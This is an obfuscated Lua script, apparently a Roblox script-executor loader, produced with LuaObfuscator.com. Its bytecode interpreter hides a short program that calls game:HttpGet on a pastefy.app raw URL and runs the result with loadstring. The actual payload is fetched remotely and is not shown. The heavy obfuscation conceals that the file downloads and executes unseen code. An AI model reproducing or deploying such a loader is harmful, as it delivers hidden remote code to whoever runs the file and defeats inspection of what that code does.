--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v91=0;while true do if (v91==0) then v19=v0(v3(v30,1,1));return "";end end else local v92=v2(v0(v30,16));if v19 then local v114=0;local v115;while true do if (v114==1) then return v115;end if (v114==0) then v115=v5(v92,v19);v19=nil;v114=1;end end else return v92;end end end);local function v20(v31,v32,v33) if v33 then local v93=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + (1711 -(1523 + 114)))))) ;return v93-(v93%(569 -(367 + 201))) ;else local v94=((835 + 94) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v94 + v94))>=v94) and (1 + 0)) or (877 -((401 -119) + 595)) ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 19 + 66)) ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (16777566 -((1039 -(802 + 150)) + 263))) + (v41 * (65716 -(67 + 113))) + (v40 * (188 + 68)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;v38=3 -2 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==3) then if (v48==(0 + 0)) then if (v47==(997 -(915 + 82))) then return v49 * (0 -0) ;else local v120=0 + 0 ;while true do if ((0 -0)==v120) then v48=4 -3 ;v46=0;break;end end end elseif (v48==(3234 -(1069 + 118))) then return ((v47==(0 -0)) and (v49 * ((1 -0)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-((625 + 1192) -794) ) * (v46 + (v47/((861 -(814 + 45))^((142 -90) + 0)))) ;end if (v43==((3110 -2317) -(368 + 423))) then v48=v20(v45,8 + 13 ,97 -66 );v49=((v20(v45,50 -(10 + 8) )==(1081 -(1020 + 60))) and  -(3 -2)) or ((4 + 439) -(416 + 26)) ;v43=9 -6 ;end if (v43==(1 + 0 + 0)) then v46=1 -0 ;v47=(v20(v45,439 -(145 + 293) ,1075 -(87 + 968) ) * (2^((2033 -1571) -(44 + 386)))) + v44 ;v43=1488 -(998 + 488) ;end if (v43==(1913 -(1789 + 113 + 11))) then v44=v23();v45=v23();v43=(1733 -966) -(745 + 21) ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(1413 -(447 + 966))) then return "";end end v51=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;local v52={};for v68=1818 -(1703 + 114) , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0 -0 ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v113=(function() return 0;end)();while true do if (v113~=(341 -(218 + 123))) then else if (v104==(1582 -(1535 + 46))) then while true do if (v95~=(0 + 0)) then else v96=(function() return v97();end)();if (v98(v96, #":", #" ")~=(0 + 0)) then else local v156=(function() return 0;end)();local v157=(function() return;end)();local v158=(function() return;end)();local v159=(function() return;end)();local v160=(function() return;end)();while true do if (v156==(560 -(306 + 254))) then local v190=(function() return 0 + 0 ;end)();local v191=(function() return;end)();while true do if ((0 -0)==v190) then v191=(function() return 166 -(122 + 44) ;end)();while true do if (v191==(1468 -(899 + 568))) then v156=(function() return 1 -0 ;end)();break;end if (v191==0) then v157=(function() return 0;end)();v158=(function() return nil;end)();v191=(function() return 1;end)();end end break;end end end if (v156~=1) then else local v192=(function() return 0;end)();local v193=(function() return;end)();while true do if (v192~=(0 -0)) then else v193=(function() return 0 + 0 ;end)();while true do if (v193==(2 -1)) then v156=(function() return 605 -(268 + 335) ;end)();break;end if ((290 -(60 + 230))==v193) then v159=(function() return nil;end)();v160=(function() return nil;end)();v193=(function() return 573 -(426 + 146) ;end)();end end break;end end end if (v156~=(3 -1)) then else while true do if ( #">"==v157) then local v194=(function() return 65 -(30 + 35) ;end)();local v195=(function() return;end)();while true do if (0==v194) then v195=(function() return 0;end)();while true do if (v195==1) then v157=(function() return 1 + 1 ;end)();break;end if (v195==(1456 -(282 + 1174))) then v160=(function() return {v99(),v99(),nil,nil};end)();if (v158==0) then local v202=(function() return 811 -(569 + 242) ;end)();local v203=(function() return;end)();while true do if ((0 -0)~=v202) then else v203=(function() return 0 -0 ;end)();while true do if (v203==(0 + 0)) then v160[ #"nil"]=(function() return v99();end)();v160[ #"0313"]=(function() return v99();end)();break;end end break;end end elseif (v158== #">") then v160[ #"91("]=(function() return v100();end)();elseif (v158==(1026 -(706 + 318))) then v160[ #"91("]=(function() return v100() -((1253 -(721 + 530))^(42 -26)) ;end)();elseif (v158~= #"asd") then else local v210=(function() return 1271 -(945 + 326) ;end)();local v211=(function() return;end)();while true do if (v210~=0) then else v211=(function() return 580 -(361 + 219) ;end)();while true do if ((320 -(53 + 267))==v211) then v160[ #"91("]=(function() return v100() -((1 + 1)^16) ;end)();v160[ #"0313"]=(function() return v99();end)();break;end end break;end end end v195=(function() return 2 -1 ;end)();end end break;end end end if (v157~= #"gha") then else if (v98(v159, #"xxx", #"xnx")~= #".") then else v160[ #"http"]=(function() return v101[v160[ #"xnxx"]];end)();end v102[v103]=(function() return v160;end)();break;end if (v157~=0) then else local v197=(function() return 0;end)();local v198=(function() return;end)();while true do if (v197==(0 + 0)) then v198=(function() return 0;end)();while true do if (0~=v198) then else v158=(function() return v98(v96,415 -(15 + 398) , #"nil");end)();v159=(function() return v98(v96, #".com",988 -(18 + 964) );end)();v198=(function() return 1;end)();end if (v198==(701 -(271 + 429))) then v157=(function() return  #"!";end)();break;end end break;end end end if (v157==2) then local v199=(function() return 0;end)();local v200=(function() return;end)();while true do if (v199==(0 + 0)) then v200=(function() return 1500 -(1408 + 92) ;end)();while true do if (v200~=(1086 -(461 + 625))) then else if (v98(v159, #"/", #"\\")~= #".") then else v160[1290 -(993 + 295) ]=(function() return v101[v160[1 + 1 ]];end)();end if (v98(v159,2,1173 -(418 + 753) )== #"]") then v160[ #"-19"]=(function() return v101[v160[ #"gha"]];end)();end v200=(function() return 1 + 0 ;end)();end if (v200~=(1 + 0)) then else v157=(function() return  #"91(";end)();break;end end break;end end end end break;end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end if (0~=v104) then else local v124=(function() return 0 + 0 ;end)();while true do if (v124==1) then v104=(function() return 1;end)();break;end if (v124==(0 + 0)) then v95=(function() return 529 -(406 + 123) ;end)();v96=(function() return nil;end)();v124=(function() return 1770 -(1749 + 20) ;end)();end end end break;end end end end;end)();local v54=(function() return function(v105,v106,v107) local v108=(function() return 0 + 0 ;end)();local v109=(function() return;end)();while true do if (v108==(1322 -(1249 + 73))) then v109=(function() return 0 + 0 ;end)();while true do if (v109~=0) then else local v125=(function() return 0;end)();while true do if (0~=v125) then else v105[v106-#"<" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"|",v59 do local v71=(function() return 0 + 0 ;end)();local v72=(function() return;end)();local v73=(function() return;end)();local v74=(function() return;end)();while true do if (v71==(0 + 0)) then v72=(function() return 1145 -(466 + 679) ;end)();v73=(function() return nil;end)();v71=(function() return 2 -1 ;end)();end if (v71==1) then v74=(function() return nil;end)();while true do if (v72~=(2 -1)) then else if (v73== #",") then v74=(function() return v21()~=(0 -0) ;end)();elseif (v73==(1902 -(106 + 1794))) then v74=(function() return v24();end)();elseif (v73~= #"gha") then else v74=(function() return v25();end)();end v60[v70]=(function() return v74;end)();break;end if (v72==(0 + 0)) then local v122=(function() return 0;end)();local v123=(function() return;end)();while true do if (v122==(0 + 0)) then v123=(function() return 0;end)();while true do if (v123~=(405 -(118 + 287))) then else local v161=(function() return 0 -0 ;end)();while true do if (v161==1) then v123=(function() return 2 -1 ;end)();break;end if (v161~=(114 -(4 + 110))) then else v73=(function() return v21();end)();v74=(function() return nil;end)();v161=(function() return 585 -(57 + 527) ;end)();end end end if (v123~=1) then else v72=(function() return 1428 -(41 + 1386) ;end)();break;end end break;end end end end break;end end end v58[ #"gha"]=(function() return v21();end)();for v75= #":",v23() do FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v60,v55,v75=(function() return v53(FlatIdent_8199B,Descriptor,v21,v20,v22,v23,v60,v55,v75);end)();end for v76= #"\\",v23() do v56,v76,v28=(function() return v54(v56,v76,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[2 -(2 -1) ];local v66=v62[379 -(142 + 235) ];local v67=v62[(10 + 3) -10 ];return function(...) local v77=v65;local v78=v66;local v79=v67;local v80=v27;local v81=1 + 0 ;local v82= -((2039 -(810 + 251)) -(553 + 424));local v83={};local v84={...};local v85=v12("#",...) -(1 + 0 + 0) ;local v86={};local v87={};for v110=0 + 0 ,v85 do if ((v110>=v79) or (2803>4549)) then v83[v110-v79 ]=v84[v110 + 1 + 0 ];else v87[v110]=v84[v110 + 1 + 0 ];end end local v88=(v85-v79) + 1 + 0 ;local v89;local v90;while true do v89=v77[v81];v90=v89[2 -1 ];if (v90<=(11 -7)) then if (v90<=(2 -1)) then if (v90>(0 + 0 + 0)) then local v126=0 -0 ;local v127;local v128;while true do if ((3927>1413) and (1==v126)) then v87[v127 + (3 -2) ]=v128;v87[v127]=v128[v89[4 + 0 ]];break;end if ((v126==(753 -(239 + 514))) or (220>=3022)) then v127=v89[5 -(3 + 0) ];v128=v87[v89[2 + 1 ]];v126=(1863 -(43 + 490)) -(797 + 532) ;end end else do return;end end elseif (v90<=(2 + 0)) then v87[v89[1 + 1 ]]=v89[6 -3 ]~=(1202 -(373 + 829)) ;elseif ((2822==2822) and (v90==3)) then local v141=731 -(476 + 255) ;local v142;local v143;local v144;local v145;local v146;while true do if (v141==(1471 -(1404 + 59))) then v146=v89[1132 -(369 + 761) ];v87[v146]=v87[v146](v13(v87,v146 + 1 + 0 ,v82));v81=v81 + (1 -0) ;v89=v77[v81];v141=571 -((1067 -(711 + 22)) + 228) ;end if (v141==(3 -1)) then v81=v81 + (3 -2) ;v89=v77[v81];v87[v89[240 -(64 + 174) ]]=v64[v89[(860 -(240 + 619)) + 2 ]];v81=v81 + (1 -0) ;v141=3 -0 ;end if ((v141==(236 -(141 + 95))) or (1154<=788)) then v142=nil;v143,v144=nil;v145=nil;v146=nil;v141=1;end if (v141==(342 -(144 + 192))) then v89=v77[v81];v146=v89[218 -(42 + 174) ];v143,v144=v80(v87[v146](v13(v87,v146 + 1 + 0 ,v89[6 -3 ])));v82=(v144 + v146) -(1 + 0) ;v141=3 + 4 ;end if ((1507 -(363 + 276 + 865))==v141) then v89=v77[v81];v146=v89[2 + 0 ];v145=v87[v89[1583 -(1183 + 397) ]];v87[v146 + 1 + 0 ]=v145;v141=11 -7 ;end if ((v141==(3 + (1 -0))) or (1643>3379)) then v87[v146]=v145[v89[3 + 1 ]];v81=v81 + (1976 -(1913 + 5 + 57)) ;v89=v77[v81];v87[v89[2 + 0 ]]=v89[1747 -(1344 + 400) ];v141=13 -8 ;end if (v141==(1934 -(565 + 1368))) then v87[v89[7 -5 ]]={};v81=v81 + (2 -1) ;v89=v77[v81];v87[v89[1663 -((1882 -(255 + 150)) + 184) ]]=v64[v89[3 -0 ]];v141=2 + 0 + 0 ;end if (v141==(863 -(564 + 292))) then v142=0 -0 ;for v187=v146,v82 do v142=v142 + (2 -1) ;v87[v187]=v143[v142];end v81=v81 + ((164 + 141) -(244 + 60)) ;v89=v77[v81];v141=7 + 1 ;end if ((v141==(481 -(41 + 435))) or (1061==1857)) then v81=v81 + (1002 -(938 + 63)) ;v89=v77[v81];v87[v89[(8 -6) + 0 ]]=v89[(3643 -2515) -(936 + 189) ]~=((1739 -(404 + 1335)) + 0) ;v81=v81 + (1614 -(1565 + (454 -(183 + 223)))) ;v141=6;end if (v141==9) then v87[v89[2]]();v81=v81 + (1 -0) ;v89=v77[v81];do return;end break;end end else v87[v89[2 + 0 ]]=v89[1141 -(782 + 356) ];end elseif (v90<=((181 + 92) -(176 + 91))) then if (v90>((5 + 8) -8)) then local v130=v89[1 + 1 ];v87[v130]=v87[v130](v13(v87,v130 + ((2224 -(10 + 327)) -(927 + 959)) ,v82));else v87[v89[2 -0 ]]=v64[v89[3]];end elseif ((2760>1364) and (v90<=7)) then local v134=v89[1094 -(975 + 117) ];local v135,v136=v80(v87[v134](v13(v87,v134 + (1876 -(157 + 1718)) ,v89[3 + 0 ])));v82=(v136 + v134) -((3 + 0) -2) ;local v137=0 -(338 -(118 + 220)) ;for v138=v134,v82 do v137=v137 + (1019 -(697 + 321)) ;v87[v138]=v135[v137];end elseif (v90==(19 -11)) then v87[v89[5 -3 ]]={};else v87[v89[3 -(1 + 0) ]]();end v81=v81 + (1797 -(503 + 1293)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F506A2Q6576685A6D2F726177000A4Q00037Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
